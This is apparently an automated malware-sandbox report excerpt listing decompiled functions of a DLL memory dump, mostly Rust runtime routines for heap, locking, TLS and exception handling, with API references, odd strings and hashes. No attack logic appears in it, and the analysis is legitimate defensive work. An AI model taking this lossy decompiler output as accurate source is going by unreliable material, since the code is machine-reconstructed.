                          0x6f23c702
                          0x6f23c708
                          0x6f23c7ad
                          0x6f23c7b0
                          0x6f23c7c6
                          0x6f23c7ce
                          0x6f23c7ce
                          0x6f23c7d7
                          0x6f23c7db
                          0x6f23c7e0
                          0x6f23c7e0
                          0x6f23c7f1
                          0x6f23c70e
                          0x6f23c713
                          0x6f23c719
                          0x6f23c720
                          0x6f23c730
                          0x6f23c735
                          0x6f23c73c
                          0x00000000
                          0x6f23c73e
                          0x6f23c73e
                          0x6f23c741
                          0x6f23c744
                          0x6f23c74b
                          0x6f23c74f
                          0x6f23c755
                          0x6f23c75f
                          0x6f23c76d
                          0x6f23c76d
                          0x6f23c722
                          0x6f23c722
                          0x6f23c729
                          0x6f23c76e
                          0x6f23c773
                          0x6f23c778
                          0x6f23c77d
                          0x00000000
                          0x6f23c72b
                          0x6f23c72b
                          0x00000000
                          0x6f23c72b
                          0x6f23c729
                          0x6f23c720
                          0x6f23c708

                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C713
                          • GetProcessHeap.KERNEL32 ref: 6F23C722
                          • HeapAlloc.KERNEL32(03230000,00000000,00000020), ref: 6F23C735
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C787
                          Strings
                          • called `Option::unwrap()` on a `None` value, xrefs: 6F23C7B7
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6F23C794
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: 2945062b22ac099eea1fa7e1a45fc4a31c87b59f062de43f004f64c8ced776ef
                          • Instruction ID: 8f7916c5054d70a54ef26d797e03bddd9e44c35ac1804045c712cf025da9ad2f
                          • Opcode Fuzzy Hash: 2945062b22ac099eea1fa7e1a45fc4a31c87b59f062de43f004f64c8ced776ef
                          • Instruction Fuzzy Hash: 4B31F4F1E4031D9BDB148F94C9487AEBBF5EB85724F104129D825A77C0DBB4A419CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2310A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6F2310A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6F243B00;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6f28adc8;
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6f27b227]");
						asm("movsd xmm1, [0x6f27b220]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6f28adc8;
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6f27b237]");
								asm("movsd xmm1, [0x6f27b22f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6F256C40(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6F256BC0( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6F24AE10(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6F249770(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6f28adc8, 0, _v36);
								}
								HeapFree( *0x6f28adc8, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6f28adc8 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6F256C30(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6F231000(_v52, _v48);
						return E6F231000(_v40, 0xf);
					} else {
						 *0x6f28adc8 = _t45;
						goto L3;
					}
				}
				L21:
			}


























                          0x6f2310a0
                          0x6f2310a0
                          0x6f2310a0
                          0x6f2310a3
                          0x6f2310a4
                          0x6f2310a5
                          0x6f2310a6
                          0x6f2310a9
                          0x6f2310ac
                          0x6f2310b3
                          0x6f2310c4
                          0x6f2310c7
                          0x6f2310cd
                          0x6f2310d4
                          0x6f2310e8
                          0x6f2310ed
                          0x6f2310f4
                          0x00000000
                          0x6f2310fa
                          0x6f2310fa
                          0x6f231102
                          0x6f23110a
                          0x6f23110d
                          0x6f231112
                          0x6f231116
                          0x6f23111d
                          0x6f231131
                          0x6f231136
                          0x6f23113d
                          0x00000000
                          0x6f231143
                          0x6f231143
                          0x6f23114b
                          0x6f231153
                          0x6f231155
                          0x6f23115a
                          0x6f23115d
                          0x6f231164
                          0x6f231169
                          0x6f231192
                          0x6f231195
                          0x6f231198
                          0x00000000
                          0x00000000
                          0x6f23119a
                          0x6f23119a
                          0x6f2311a0
                          0x6f2311a2
                          0x6f231235
                          0x6f23123c
                          0x6f231241
                          0x00000000
                          0x6f2311a8
                          0x6f2311ab
                          0x6f2311ad
                          0x6f2311b5
                          0x6f2311b8
                          0x6f2311bb
                          0x6f2311c2
                          0x6f2311c5
                          0x6f2311ca
                          0x6f2311cd
                          0x6f2311d0
                          0x6f2311d3
                          0x6f2311d6
                          0x6f2311d6
                          0x6f231171
                          0x6f231175
                          0x6f23117e
                          0x6f231180
                          0x6f231185
                          0x6f231188
                          0x6f23118a
                          0x6f23118d
                          0x6f231191
                          0x00000000
                          0x6f231191
                          0x00000000
                          0x6f2311a2
                          0x6f2311db
                          0x6f2311e5
                          0x6f2311f2
                          0x6f2311fa
                          0x6f2311fe
                          0x6f23120b
                          0x6f23120b
                          0x6f23121b
                          0x6f231220
                          0x6f231223
                          0x6f231230
                          0x6f231230
                          0x6f23111f
                          0x6f23111f
                          0x6f231126
                          0x6f23124a
                          0x6f23124a
                          0x00000000
                          0x6f23112c
                          0x6f23112c
                          0x00000000
                          0x6f23112c
                          0x6f231126
                          0x6f23111d
                          0x6f2310d6
                          0x6f2310d6
                          0x6f2310dd
                          0x6f231243
                          0x6f231243
                          0x6f23124f
                          0x6f231254
                          0x6f231259
                          0x6f231264
                          0x6f23126d
                          0x6f231283
                          0x6f2310e3
                          0x6f2310e3
                          0x00000000
                          0x6f2310e3
                          0x6f2310dd
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6F2310D6
                          • HeapAlloc.KERNEL32(03230000,00000000,0000000F), ref: 6F2310ED
                          • GetProcessHeap.KERNEL32(03230000,00000000,0000000F), ref: 6F23111F
                          • HeapAlloc.KERNEL32(03230000,00000000,00000010,03230000,00000000,0000000F), ref: 6F231136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,03230000,00000000,0000000F), ref: 6F23120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,03230000,00000000,0000000F), ref: 6F23121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 0f41d496daa59bd57b1c0e3be2eb7ed46e48365bf8231ec6cc82206b1e7321b7
                          • Instruction ID: e17e0e790380e16ce62931fd98be57a782f66edf682e91bbe1e439362d9d8f23
                          • Opcode Fuzzy Hash: 0f41d496daa59bd57b1c0e3be2eb7ed46e48365bf8231ec6cc82206b1e7321b7
                          • Instruction Fuzzy Hash: 6D516CB5E0072D9BDB00CFA4C880BEEB7B5FF49345F108225E815AB681DB759850CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24C860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F24C860(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E6F256B40(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x6f28a4a4;
				E6F24C820(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x6f28a4a4);
				E6F24DB5C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E6F24DCE0(_t80, 0xfffffffe, _t103, 0x6f28a4a4);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E6F24DC80(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E6F24C820(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x6f282504;
											if(__eflags != 0) {
												_t75 = E6F2569A0(__eflags, 0x6f282504);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x6f282504; // 0x6f24ca71
													 *0x6f258154(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E6F24DCC0(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E6F24DCE0(_t68, _t100, _t103, 0x6f28a4a4);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E6F24C820(_t80, _t95, _t100, _t103, _v12);
										E6F24DCA0();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}




































                          0x6f24c860
                          0x6f24c867
                          0x6f24c86b
                          0x6f24c86c
                          0x6f24c872
                          0x6f24c87e
                          0x6f24c880
                          0x6f24c886
                          0x6f24c886
                          0x6f24c88f
                          0x6f24c891
                          0x6f24c894
                          0x6f24c897
                          0x6f24c89f
                          0x6f24c8a4
                          0x6f24c8a7
                          0x6f24c8aa
                          0x6f24c8b1
                          0x6f24c90d
                          0x6f24c910
                          0x6f24c918
                          0x6f24c91f
                          0x00000000
                          0x6f24c91f
                          0x00000000
                          0x6f24c8b3
                          0x6f24c8b3
                          0x6f24c8b9
                          0x6f24c8bf
                          0x6f24c8c5
                          0x6f24c930
                          0x6f24c939
                          0x6f24c8c7
                          0x6f24c8c7
                          0x6f24c8c7
                          0x6f24c8cd
                          0x6f24c8d0
                          0x6f24c8d3
                          0x6f24c8d6
                          0x6f24c8d9
                          0x6f24c8de
                          0x6f24c8f4
                          0x00000000
                          0x6f24c8e0
                          0x6f24c8e0
                          0x6f24c8e2
                          0x6f24c8e7
                          0x6f24c8e9
                          0x6f24c8ec
                          0x6f24c8ee
                          0x6f24c904
                          0x6f24c924
                          0x6f24c924
                          0x6f24c928
                          0x00000000
                          0x6f24c8f0
                          0x6f24c8f0
                          0x6f24c93a
                          0x6f24c93d
                          0x6f24c943
                          0x6f24c945
                          0x6f24c94c
                          0x6f24c953
                          0x6f24c958
                          0x6f24c95b
                          0x6f24c95d
                          0x6f24c95f
                          0x6f24c96c
                          0x6f24c972
                          0x6f24c974
                          0x6f24c977
                          0x6f24c977
                          0x6f24c97a
                          0x6f24c97a
                          0x6f24c94c
                          0x6f24c980
                          0x6f24c982
                          0x6f24c987
                          0x6f24c98a
                          0x6f24c98d
                          0x6f24c995
                          0x6f24c999
                          0x6f24c99e
                          0x6f24c99e
                          0x6f24c9a1
                          0x6f24c9a5
                          0x6f24c9a8
                          0x6f24c9b8
                          0x6f24c9bd
                          0x6f24c9c1
                          0x6f24c9c4
                          0x6f24c9c7
                          0x6f24c9c9
                          0x6f24c9cf
                          0x6f24c9d2
                          0x6f24c9d2
                          0x6f24c9d5
                          0x6f24c9d5
                          0x6f24c9d7
                          0x6f24c9d9
                          0x00000000
                          0x00000000
                          0x6f24c9db
                          0x6f24c9dd
                          0x00000000
                          0x6f24c9df
                          0x6f24c9df
                          0x6f24c9e2
                          0x6f24c9e5
                          0x00000000
                          0x6f24c9e7
                          0x6f24c9e7
                          0x6f24c9ea
                          0x6f24c9ed
                          0x6f24c9ef
                          0x00000000
                          0x6f24c9f1
                          0x00000000
                          0x6f24c9f1
                          0x6f24c9ef
                          0x6f24c9e5
                          0x00000000
                          0x6f24c9dd
                          0x6f24c9f3
                          0x6f24c9f5
                          0x6f24c9f5
                          0x6f24c9f9
                          0x6f24c9cb
                          0x6f24c9cb
                          0x6f24c9cb
                          0x6f24c9ce
                          0x6f24c9ce
                          0x6f24c8f2
                          0x00000000
                          0x6f24c8f2
                          0x6f24c8f0
                          0x6f24c8ee
                          0x00000000
                          0x6f24c8f7
                          0x6f24c8f7
                          0x6f24c8f9
                          0x6f24c900
                          0x00000000
                          0x6f24c902
                          0x00000000
                          0x6f24c900
                          0x6f24c8c5
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6F24C89F
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6F24C953
                          • _ValidateLocalCookies.LIBCMT ref: 6F24C9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: ee522a984645c8b24afbd6d92645f8e800a8ba0f0a3fa01009689ef690c625d4
                          • Instruction ID: a092db173f37da78c312b5edf7ec7975d003d76ab57eba2562cd707f72b22e61
                          • Opcode Fuzzy Hash: ee522a984645c8b24afbd6d92645f8e800a8ba0f0a3fa01009689ef690c625d4
                          • Instruction Fuzzy Hash: 2841C834A4120DAFCF08CF6CC884AAE7BB5AF45728F108155E8249B791D7B5E919CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F242B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E6F242B10(void* __ebx, long* __ecx, void* __edi, void* __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				long _v76;
				intOrPtr _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				intOrPtr _v104;
				char _v108;
				void* __ebp;
				long _t41;
				void* _t47;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void _t56;
				void* _t65;
				long _t70;
				long* _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t87;

				_t78 = _t77 - 0x5c;
				_v32 = _t78;
				_v20 = 0xffffffff;
				_v24 = E6F243C10;
				_t73 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				__imp__AcquireSRWLockExclusive(0x6f28adb4, __esi, __edi, __ebx);
				_v36 = 0x6f28adb4;
				_t70 =  *__ecx;
				if(_t70 != 0) {
					L10:
					__imp__ReleaseSRWLockExclusive(_v36);
					 *[fs:0x0] = _v28;
					return _t70;
				} else {
					_t7 =  &(_t73[1]); // 0x6f243100
					_t56 =  *_t7;
					_t41 = TlsAlloc();
					if(_t41 == 0xffffffff) {
						_v20 = 0;
						E6F256E20(_t56, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi", 0x2e, _t70, _t73, __eflags, 0x6f27de0c);
						_t78 = _t78 + 4;
						asm("ud2");
						goto L12;
					} else {
						_t70 = _t41;
						if(_t56 == 0) {
							L9:
							 *_t73 = _t70;
							if(_t70 == 0) {
								L12:
								_v108 = 0x6f27d74c;
								_v104 = 1;
								_v100 = 0;
								_v92 = 0x6f27cd60;
								_v84 = 0x6f27d5a4;
								_v80 = 2;
								_v40 = 0;
								_v44 = 0;
								_v88 = 0;
								_v76 = 0;
								_v20 = 0;
								_v60 =  &_v108;
								_v56 = E6F2322E0;
								_v68 =  &_v60;
								_v64 = 1;
								_v52 = E6F23D2A0( &_v44, __eflags);
								_v48 =  &_v84;
								E6F23D460( &_v52);
								asm("int 0x29");
								asm("ud2");
								goto L13;
							} else {
								goto L10;
							}
						} else {
							_t51 =  *0x6f28adc8;
							if(_t51 != 0) {
								L6:
								_t52 = HeapAlloc(_t51, 0, 0xc);
								_t87 = _t52;
								if(_t87 == 0) {
									goto L13;
								} else {
									 *_t52 = _t56;
									 *(_t52 + 4) = _t70;
									 *(_t52 + 8) = 0;
									_t65 = _t52;
									_t53 =  *0x6f28adcc; // 0x0
									do {
										 *((intOrPtr*)(_t65 + 8)) = _t53;
										asm("lock cmpxchg [0x6f28adcc], ecx");
									} while (_t87 != 0);
									goto L9;
								}
							} else {
								_t51 = GetProcessHeap();
								if(_t51 == 0) {
									L13:
									_t47 = E6F256C30(_t56, 0xc, 4, _t70, _t73, __eflags);
									asm("ud2");
									__eflags =  &_a8;
									return E6F23C870(_t47,  &_v36);
								} else {
									 *0x6f28adc8 = _t51;
									goto L6;
								}
							}
						}
					}
				}
			}





































                          0x6f242b16
                          0x6f242b19
                          0x6f242b1c
                          0x6f242b23
                          0x6f242b2a
                          0x6f242b36
                          0x6f242b39
                          0x6f242b44
                          0x6f242b4a
                          0x6f242b51
                          0x6f242b55
                          0x6f242bc5
                          0x6f242bc8
                          0x6f242bd1
                          0x6f242be0
                          0x6f242b57
                          0x6f242b57
                          0x6f242b57
                          0x6f242b5a
                          0x6f242b63
                          0x6f242be1
                          0x6f242bf7
                          0x6f242bfc
                          0x6f242bff
                          0x00000000
                          0x6f242b65
                          0x6f242b65
                          0x6f242b69
                          0x6f242bbd
                          0x6f242bc1
                          0x6f242bc3
                          0x6f242c01
                          0x6f242c0a
                          0x6f242c11
                          0x6f242c18
                          0x6f242c1f
                          0x6f242c26
                          0x6f242c2d
                          0x6f242c34
                          0x6f242c38
                          0x6f242c3f
                          0x6f242c46
                          0x6f242c4d
                          0x6f242c54
                          0x6f242c5a
                          0x6f242c61
                          0x6f242c64
                          0x6f242c73
                          0x6f242c76
                          0x6f242c79
                          0x6f242c83
                          0x6f242c85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f242b6b
                          0x6f242b6b
                          0x6f242b72
                          0x6f242b86
                          0x6f242b8b
                          0x6f242b90
                          0x6f242b92
                          0x00000000
                          0x6f242b98
                          0x6f242b98
                          0x6f242b9a
                          0x6f242b9d
                          0x6f242ba4
                          0x6f242ba6
                          0x6f242bb0
                          0x6f242bb0
                          0x6f242bb3
                          0x6f242bb3
                          0x00000000
                          0x6f242bb0
                          0x6f242b74
                          0x6f242b74
                          0x6f242b7b
                          0x6f242c87
                          0x6f242c91
                          0x6f242c96
                          0x6f242ca4
                          0x6f242cb3
                          0x6f242b81
                          0x6f242b81
                          0x00000000
                          0x6f242b81
                          0x6f242b7b
                          0x6f242b72
                          0x6f242b69
                          0x6f242b63

                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6F28ADB4), ref: 6F242B44
                          • TlsAlloc.KERNEL32 ref: 6F242B5A
                          • GetProcessHeap.KERNEL32 ref: 6F242B74
                          • HeapAlloc.KERNEL32(03230000,00000000,0000000C), ref: 6F242B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADB4), ref: 6F242BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6F242BE8
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 267174f725e02b7bdc8655f988d18df5d9b6061443292a6319ee464ab4bfc33f
                          • Instruction ID: 6b2d05215982d9fb9893b7c79f56c14133d4a54265fbaeb8625a8e6ccacc4a08
                          • Opcode Fuzzy Hash: 267174f725e02b7bdc8655f988d18df5d9b6061443292a6319ee464ab4bfc33f
                          • Instruction Fuzzy Hash: 194124B590031E9FEB04CF95C898B9EBBB1FF85319F104129D519AB780DBB59849CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F251BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F251BFC(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6f28b500 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6f2834b0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6f28b500 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6f28b500 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6F24F838(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6F24F838(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                          0x6f251c05
                          0x6f251c9a
                          0x6f251c0d
                          0x6f251c0f
                          0x6f251c19
                          0x6f251c1e
                          0x6f251c2b
                          0x6f251c40
                          0x6f251c44
                          0x6f251caa
                          0x6f251caf
                          0x6f251cb6
                          0x6f251cba
                          0x6f251cbd
                          0x6f251cbd
                          0x6f251cc3
                          0x6f251cc3
                          0x6f251ca5
                          0x6f251ca9
